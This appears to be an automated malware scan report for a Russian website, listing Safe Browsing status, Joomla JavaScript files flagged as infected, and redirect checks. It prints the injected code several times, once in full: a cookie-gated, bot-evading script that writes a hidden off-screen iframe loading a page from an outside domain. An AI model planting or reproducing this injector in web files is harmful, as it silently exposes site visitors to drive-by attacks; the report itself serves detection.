Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zhenskoepalto.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.zhenskoepalto.ru/ | 200 OK Content-Length: 56678 Content-Type: text/html | clean |
http://www.zhenskoepalto.ru/media/system/js/caption.js | 200 OK Content-Length: 2938 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki if ( element.title != "" ) { container.appendChild(text); } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); Antivirus reports:
| ||
http://www.zhenskoepalto.ru/templates/avignet_dream/js/jquery13.js | 200 OK Content-Length: 117854 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki this[0] == document ? Math.max( document.documentElement["client" + name], document.body["scroll" + name], document.documentElement["scroll" + name], document.body["offset" + name], document.documentElement["offset" + name] ) : size === undefined ? (this.length ? jQuery.css( this[0], type ) : null) : this.css( type, typeof size === "string" ? size : size + "px" ); }; });})(); }; Antivirus reports:
| ||
http://www.zhenskoepalto.ru/templates/avignet_dream/js/jquery_no_conflict.js | 200 OK Content-Length: 996 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCookie("akelbriston19ure")===undefined);if(!h()&&i){document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://kardakov.cf/luckyblock17.html"></iframe>');var j=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+j.toUTCString()}})();
jQuery.noConflict();; Antivirus reports:
| ||
http://www.zhenskoepalto.ru/templates/avignet_dream/js/s5_menu_active_and_parent_links.js | 200 OK Content-Length: 2063 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki if (s5_fm_li3[z3].parentNode.parentNode.id == "s5_navv") { if (s5_fm_li3[z3].innerHTML.indexOf("<UL") > 0 || s5_fm_li3[z3].innerHTML.indexOf("<ul") > 0) { if (s5_fm_li3[z3].className == "active") { s5_fm_li3[z3].className = "active s5_level_one_parent"; } else if (s5_fm_li3[z3].className != "active") { s5_fm_li3[z3].className = "s5_level_one_parent"; } } } }; Antivirus reports:
| ||
http://www.zhenskoepalto.ru//modules/mod_s5_tabshow/s5_tabshow/iCarousel.js/ | 404 Not Found Content-Length: 245 Content-Type: text/html | clean |
http://www.zhenskoepalto.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.zhenskoepalto.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 2216 Content-Type: text/html | clean |
http://www.google.ru/coop/cse/brand?form=cse-search-box&lang=ru | 200 OK Content-Length: 2510 Content-Type: text/javascript | clean |
http://www.zhenskoepalto.ru/modules/mod_s5_accordion_menu/js/s5_accordion_menu.js | 200 OK Content-Length: 6695 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki s5_am_h3_first[s5_am_h3_first_y].className = "s5_am_toggler s5_am_open s5_am_not_parent"; } if (s5_am_h3_first[s5_am_h3_first_y].nextSibling.innerHTML != "" && s5_am_h3_first[s5_am_h3_first_y].nextSibling.innerHTML != " ") { s5_am_h3_first[s5_am_h3_first_y].className = "s5_am_toggler s5_am_open s5_am_parent"; } } } }); Antivirus reports:
| ||
http://www.zhenskoepalto.ru/templates/avignet_dream/js/s5_effects.js | 200 OK Content-Length: 2955 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zhenskoepalto.ru
Result:
GET / HTTP/1.1
Host: zhenskoepalto.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: zhenskoepalto.ru
Referer: http://www.google.com/search?q=zhenskoepalto.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zhenskoepalto.ru
Referer: http://www.google.com/search?q=zhenskoepalto.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.